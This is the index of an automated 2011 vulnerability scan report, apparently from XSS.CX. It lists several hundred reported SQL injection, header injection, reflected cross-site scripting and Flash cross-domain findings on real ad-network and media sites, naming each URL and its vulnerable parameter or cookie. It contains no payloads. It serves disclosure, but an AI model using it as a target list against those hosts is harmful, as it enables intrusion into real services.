XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, 051302011-01

Report generated by XSS.CX at Mon Jun 13 08:12:03 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter]

1.2. http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css [REST URL parameter 2]

1.3. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js [REST URL parameter 2]

1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1]

1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2]

1.6. http://www.lijit.com/beacon [informer parameter]

1.7. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship [Referer HTTP header]

1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1]

2. File path traversal

3. HTTP header injection

3.1. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter]

3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]

3.3. http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter]

3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]

3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]

3.6. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]

4.3. http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter]

4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]

4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]

4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]

4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]

4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]

4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]

4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]

4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]

4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]

4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]

4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]

4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]

4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]

4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]

4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]

4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]

4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]

4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]

4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]

4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]

4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]

4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]

4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]

4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]

4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]

4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]

4.30. http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter]

4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]

4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]

4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]

4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]

4.35. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.36. http://ad.turn.com/server/pixel.htm [sp parameter]

4.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter]

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter]

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter]

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter]

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter]

4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.51. http://adnxs.revsci.net/imp [Z parameter]

4.52. http://adnxs.revsci.net/imp [s parameter]

4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

4.63. http://api.dimestore.com/viapi [id parameter]

4.64. http://api.mixpanel.com/track/ [callback parameter]

4.65. http://ar.voicefive.com/b/rc.pli [func parameter]

4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]

4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]

4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]

4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]

4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]

4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]

4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]

4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]

4.78. http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter]

4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]

4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter]

4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]

4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]

4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]

4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]

4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]

4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter]

4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]

4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]

4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]

4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]

4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]

4.97. http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter]

4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]

4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]

4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

4.121. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

4.122. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

4.123. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1]

4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2]

4.126. http://event.adxpose.com/event.flow [uid parameter]

4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]

4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]

4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]

4.130. http://geo.gorillanation.com/geo.php [website_id parameter]

4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]

4.132. http://ib.adnxs.com/ab [ccd parameter]

4.133. http://ib.adnxs.com/ptj [redir parameter]

4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1]

4.135. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1]

4.136. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2]

4.137. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3]

4.138. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4]

4.139. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5]

4.140. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1]

4.141. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2]

4.142. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3]

4.143. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4]

4.144. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5]

4.145. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1]

4.146. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2]

4.147. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3]

4.148. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4]

4.149. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5]

4.150. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1]

4.151. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2]

4.152. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3]

4.153. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4]

4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

4.162. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1]

4.163. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2]

4.164. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3]

4.165. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4]

4.166. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5]

4.167. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1]

4.168. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2]

4.169. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3]

4.170. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4]

4.171. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5]

4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]

4.173. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 2]

4.174. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 3]

4.175. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 4]

4.176. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 5]

4.177. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 1]

4.178. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 2]

4.179. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 3]

4.180. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 4]

4.181. http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 5]

4.182. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 1]

4.183. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 2]

4.184. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 3]

4.185. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 4]

4.186. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 5]

4.187. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 6]

4.188. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 1]

4.189. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 2]

4.190. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 3]

4.191. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 4]

4.192. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 5]

4.193. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 6]

4.194. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 1]

4.195. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 2]

4.196. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 3]

4.197. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]

4.198. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]

4.199. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpjs parameter]

4.200. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]

4.201. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]

4.202. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpck parameter]

4.203. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpvc parameter]

4.204. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [placementid parameter]

4.205. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]

4.206. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]

4.207. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]

4.208. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]

4.209. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]

4.210. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]

4.211. http://js.revsci.net/gateway/gw.js [csid parameter]

4.212. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [REST URL parameter 2]

4.213. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [sz parameter]

4.214. http://kotaku.com/static/ad_iframe.php [rand parameter]

4.215. http://kotaku.com/static/ad_iframe.php [script_url parameter]

4.216. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif [REST URL parameter 4]

4.217. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 1]

4.218. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 2]

4.219. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 3]

4.220. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 4]

4.221. http://moviesblog.mtv.com/favicon.ico [REST URL parameter 1]

4.222. http://ox-d.sbnation.com/w/1.0/ajs [o parameter]

4.223. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 [callback parameter]

4.224. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f [callback parameter]

4.225. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.226. http://s26.sitemeter.com/js/counter.asp [site parameter]

4.227. http://s26.sitemeter.com/js/counter.js [site parameter]

4.228. http://s46.sitemeter.com/js/counter.js [site parameter]

4.229. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.230. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.231. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.232. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.233. http://thesouthern.com/app/port/bulkCommentCount.php [REST URL parameter 1]

4.234. http://thesouthern.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

4.235. http://thesouthern.com/favicon.ico [REST URL parameter 1]

4.236. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 1]

4.237. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 2]

4.238. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 3]

4.239. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [name of an arbitrarily supplied request parameter]

4.240. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.241. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

4.242. http://um.simpli.fi/am_js.js [admeld_callback parameter]

4.243. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

4.244. http://um.simpli.fi/am_match [admeld_callback parameter]

4.245. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

4.246. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

4.247. http://widgets.digg.com/buttons/count [url parameter]

4.248. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

4.249. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

4.250. http://www.lijit.com/delivery/fp [n parameter]

4.251. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

4.252. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

4.253. http://www.paperg.com/jsfb/embed.php [bid parameter]

4.254. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]

4.255. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

4.256. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

4.257. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

4.258. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

4.259. http://adnxs.revsci.net/imp [Referer HTTP header]

4.260. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

4.261. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

4.262. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.263. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.264. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

4.265. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

4.266. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

4.267. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

4.268. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.269. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.270. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

4.271. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

4.272. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.273. http://d.chango.com/collector/admeldpixel [_t cookie]

4.274. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [ZEDOIDA cookie]

4.275. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [ZEDOIDA cookie]

4.276. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]

4.277. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]

4.278. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js [ruid cookie]

4.279. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js [ruid cookie]

4.280. http://s26.sitemeter.com/js/counter.asp [IP cookie]

4.281. http://s26.sitemeter.com/js/counter.js [IP cookie]

4.282. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]

4.283. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

4.284. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

4.285. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

5. Flash cross-domain policy

5.1. http://altfarm.mediaplex.com/crossdomain.xml

5.2. http://d.xp1.ru4.com/crossdomain.xml

5.3. http://dg.specificclick.net/crossdomain.xml

5.4. http://load.exelator.com/crossdomain.xml

5.5. http://m.xp1.ru4.com/crossdomain.xml

5.6. http://matrix.hbo.com/crossdomain.xml

